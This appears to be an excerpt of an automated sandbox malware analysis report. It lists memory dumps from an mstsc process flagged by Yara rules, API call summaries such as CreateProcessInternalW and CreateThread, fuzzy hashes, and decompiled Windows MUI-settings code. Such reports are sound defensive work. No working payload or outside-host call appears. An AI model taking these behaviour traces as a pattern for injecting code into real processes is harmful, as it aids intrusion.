                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                              • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                              • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                              • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                              • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                              • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                              • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                              • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                              • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                              • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                              • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                              • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                              • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                              • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                              • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                              • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                              • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                              • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                              • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                              • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                              • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                              • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                              • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                              • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                              • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 734 d9030-d9072 call dbe70 737 d914c-d9152 734->737 738 d9078-d90c8 call dbf40 call ca140 call d5aa0 734->738 745 d90d0-d90e1 Sleep 738->745 746 d9146-d914a 745->746 747 d90e3-d90e9 745->747 746->737 746->745 748 d90eb-d9111 call d8c60 747->748 749 d9113-d9133 747->749 750 d9139-d913c 748->750 749->750 751 d9134 call d8e60 749->751 750->746 751->750
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: net.dll$wininet.dll
                                              • API String ID: 3472027048-1269752229
                                              • Opcode ID: 1c15537c637d506b5088ce6831729260f576d5ad2db93eba1dee9af712fb02bd
                                              • Instruction ID: 8fdd52523c7ac28d7f640240957fdfed39c2402dc01589866f5066b26db6e19d
                                              • Opcode Fuzzy Hash: 1c15537c637d506b5088ce6831729260f576d5ad2db93eba1dee9af712fb02bd
                                              • Instruction Fuzzy Hash: 2A316FB6501705ABD725DF64C8A1FA7B7F8AF48700F10811EF61A9B242D770A945CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 754 d9029-d9072 call dbe70 758 d914c-d9152 754->758 759 d9078-d90c8 call dbf40 call ca140 call d5aa0 754->759 766 d90d0-d90e1 Sleep 759->766 767 d9146-d914a 766->767 768 d90e3-d90e9 766->768 767->758 767->766 769 d90eb-d9111 call d8c60 768->769 770 d9113-d9133 768->770 771 d9139-d913c 769->771 770->771 772 d9134 call d8e60 770->772 771->767 772->771
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: net.dll$wininet.dll
                                              • API String ID: 3472027048-1269752229
                                              • Opcode ID: eedfed6f7c96e1241a42f0bed07a3f6aba81388ac4727b09639981264d464368
                                              • Instruction ID: 1e97bb1f550a181c53ec2e24578070bee15053d6ff4458b3f91ab6aec8490d40
                                              • Opcode Fuzzy Hash: eedfed6f7c96e1241a42f0bed07a3f6aba81388ac4727b09639981264d464368
                                              • Instruction Fuzzy Hash: B9217EB6601705AFD721DF69C8A5FABBBB8EF88700F10811EF6195B342D770A545CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 000C76DA
                                              • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 000C76FB
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              • Opcode ID: 23ff2eef3b228a259b2ba45b449187bf6c6c2c7717686149248ba4aa10bcfba3
                                              • Instruction ID: d6d61ec4f3096bec6fdb097d3579cca8438c4244d6ef9423036d515b9421fb6f
                                              • Opcode Fuzzy Hash: 23ff2eef3b228a259b2ba45b449187bf6c6c2c7717686149248ba4aa10bcfba3
                                              • Instruction Fuzzy Hash: 9F018431A803297BE720A7959C43FFE776C9B45B51F040119FF04BA1C2EA94690546F6
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 000CA1B2
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: c06de1ea13a8af031dc4c62c0dda777427f6ee9b41022bae029d2c9e7cdc61ad
                                              • Instruction ID: 052ebe0307073cffcbd15b547bc94ebe47112b37a01f8d72c3e10d30486799c0
                                              • Opcode Fuzzy Hash: c06de1ea13a8af031dc4c62c0dda777427f6ee9b41022bae029d2c9e7cdc61ad
                                              • Instruction Fuzzy Hash: 81010CB5E4020DABDB10EBA4DC42FDEB7B89B55308F0441A9AD0997242F631EB14CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 000DA6E4
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInternalProcess
                                              • String ID:
                                              • API String ID: 2186235152-0
                                              • Opcode ID: 876076b5dbb47a892ddfedc491b322af51d313241269a642b7957940f7f79bb3
                                              • Instruction ID: 1a98c946fbeeb914e7f7acf1fa2ea2403c58097d4ddf9871fe99300f7e34a963
                                              • Opcode Fuzzy Hash: 876076b5dbb47a892ddfedc491b322af51d313241269a642b7957940f7f79bb3
                                              • Instruction Fuzzy Hash: 3B01B2B2210208BFCB54DF89DC80EEB77ADEF8C754F158258BA0D97241C630E851CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000,?,?,000CD2F0,?,?), ref: 000D919C
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread
                                              • String ID:
                                              • API String ID: 2422867632-0
                                              • Opcode ID: 6a3c653eb95446242ab25097f4705a6bf3d7cf87e5c080aefc390fcdb235777f
                                              • Instruction ID: cd7ca169501db02bfce32c6be694aab58b42f5153e07941da4b37480b5958744
                                              • Opcode Fuzzy Hash: 6a3c653eb95446242ab25097f4705a6bf3d7cf87e5c080aefc390fcdb235777f
                                              • Instruction Fuzzy Hash: 9EF0E5363803103BE3206568CC13FE737589F85B25F14012EFA8AAB3C2D591F94246E4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000,?,?,000CD2F0,?,?), ref: 000D919C
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread
                                              • String ID:
                                              • API String ID: 2422867632-0
                                              • Opcode ID: 16809be654502e1535f31eed24f698d23d9c723d2a2eeed363768dc1ccac579f
                                              • Instruction ID: bb67e2e8cbe1d24728c940d35f45de0853c58991e201cfe2e90c8aa855f8c971
                                              • Opcode Fuzzy Hash: 16809be654502e1535f31eed24f698d23d9c723d2a2eeed363768dc1ccac579f
                                              • Instruction Fuzzy Hash: 00E06D3338131437E22061A99C02FE7B38C9B80B21F55012AFA4DEB2C2D591F90142A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 000DA64D
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0
                                              • Opcode ID: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
                                              • Instruction ID: 99b192ce9999673008009c5831137c19bb34df7a7c334d9dc92fd1da20487298
                                              • Opcode Fuzzy Hash: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
                                              • Instruction Fuzzy Hash: 1EE012B1200208ABDB14EF89DC49EA737ACEF88750F118159BA085B242C630E9108AB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,000CD5C2,000CD5C2,?,00000000,?,?), ref: 000DA7B0
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
                                              • Instruction ID: 2c848babd81f30dddcfd427d1b970649d0473644d54a082ebedbabdf148b28f2
                                              • Opcode Fuzzy Hash: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
                                              • Instruction Fuzzy Hash: 3CE01AB12002086BDB10DF89CC45EE737ADEF89654F118165BA0857242C530E8148AB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlAllocateHeap.NTDLL(000D5186,?,000D58FF,000D58FF,?,000D5186,?,?,?,?,?,00000000,00000005,00000206), ref: 000DA60D
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 4eeee5f58efdf21d171fa9f1326e000b1994929843c0f345beb3c8c7aaa15deb
                                              • Instruction ID: 8bd36b00dec6290f8efc831d53dbdd8e836eaed1748fc9073d2526ab522c9200
                                              • Opcode Fuzzy Hash: 4eeee5f58efdf21d171fa9f1326e000b1994929843c0f345beb3c8c7aaa15deb
                                              • Instruction Fuzzy Hash: D6E012B1200208ABDB14EF89DC85EAB37ACEF88654F118155BA085B242CA30F9108AB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • SetErrorMode.KERNEL32(00008003,?,?,000C8233,?), ref: 000CDA5B
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_c0000_mstsc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: 785235cf212cd6fac8d19be006f72e66bb65ffde2b76f0b6724cfa02a8199225
                                              • Instruction ID: e7127ed50544142cf3b322f4f972d86d8bd31f5d7267ea6c5a754f94d28fb659
                                              • Opcode Fuzzy Hash: 785235cf212cd6fac8d19be006f72e66bb65ffde2b76f0b6724cfa02a8199225
                                              • Instruction Fuzzy Hash: ACD0A77164030437F610EBE49C43F6633CC9B48B51F454074FA09D73C3E950F4008165
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 94%
                                              			E025E8788(signed int __ecx, void* __edx, signed int _a4) {
                                              				signed int _v8;
                                              				short* _v12;
                                              				void* _v16;
                                              				signed int _v20;
                                              				char _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				char _v36;
                                              				signed int _v40;
                                              				char _v44;
                                              				signed int _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				signed int _v60;
                                              				char _v68;
                                              				void* _t216;
                                              				intOrPtr _t231;
                                              				short* _t235;
                                              				intOrPtr _t257;
                                              				short* _t261;
                                              				intOrPtr _t284;
                                              				intOrPtr _t288;
                                              				void* _t314;
                                              				signed int _t318;
                                              				short* _t319;
                                              				intOrPtr _t321;
                                              				void* _t328;
                                              				void* _t329;
                                              				char* _t332;
                                              				signed int _t333;
                                              				signed int* _t334;
                                              				void* _t335;
                                              				void* _t338;
                                              				void* _t339;
                                              
                                              				_t328 = __edx;
                                              				_t322 = __ecx;
                                              				_t318 = 0;
                                              				_t334 = _a4;
                                              				_v8 = 0;
                                              				_v28 = 0;
                                              				_v48 = 0;
                                              				_v20 = 0;
                                              				_v40 = 0;
                                              				_v32 = 0;
                                              				_v52 = 0;
                                              				if(_t334 == 0) {
                                              					_t329 = 0xc000000d;
                                              					L49:
                                              					_t334[0x11] = _v56;
                                              					 *_t334 =  *_t334 | 0x00000800;
                                              					_t334[0x12] = _v60;
                                              					_t334[0x13] = _v28;
                                              					_t334[0x17] = _v20;
                                              					_t334[0x16] = _v48;
                                              					_t334[0x18] = _v40;
                                              					_t334[0x14] = _v32;
                                              					_t334[0x15] = _v52;
                                              					return _t329;
                                              				}
                                              				_v56 = 0;
                                              				if(E025E8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                              					_v56 = 1;
                                              					if(_v8 != 0) {
                                              						_t207 = E025CE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                              					}
                                              					_push(1);
                                              					_v8 = _t318;
                                              					E025E718A(_t207);
                                              					_t335 = _t335 + 4;
                                              				}
                                              				_v60 = _v60 | 0xffffffff;
                                              				if(E025E8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                              					_t333 =  *_v8;
                                              					_v60 = _t333;
                                              					_t314 = E025CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                              					_push(_t333);
                                              					_v8 = _t318;
                                              					E025E718A(_t314);
                                              					_t335 = _t335 + 4;
                                              				}
                                              				_t216 = E025E8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                              				_t332 = ";";
                                              				if(_t216 < 0) {
                                              					L17:
                                              					if(E025E8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                              						L30:
                                              						if(E025E8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                              							L46:
                                              							_t329 = 0;
                                              							L47:
                                              							if(_v8 != _t318) {
                                              								E025CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                              							}
                                              							if(_v28 != _t318) {
                                              								if(_v20 != _t318) {
                                              									E025CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                              									_v20 = _t318;
                                              									_v40 = _t318;
                                              								}
                                              							}
                                              							goto L49;
                                              						}
                                              						_t231 = _v24;
                                              						_t322 = _t231 + 4;
                                              						_push(_t231);
                                              						_v52 = _t322;
                                              						E025E718A(_t231);
                                              						if(_t322 == _t318) {
                                              							_v32 = _t318;
                                              						} else {
                                              							_v32 = E025CE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                              						}
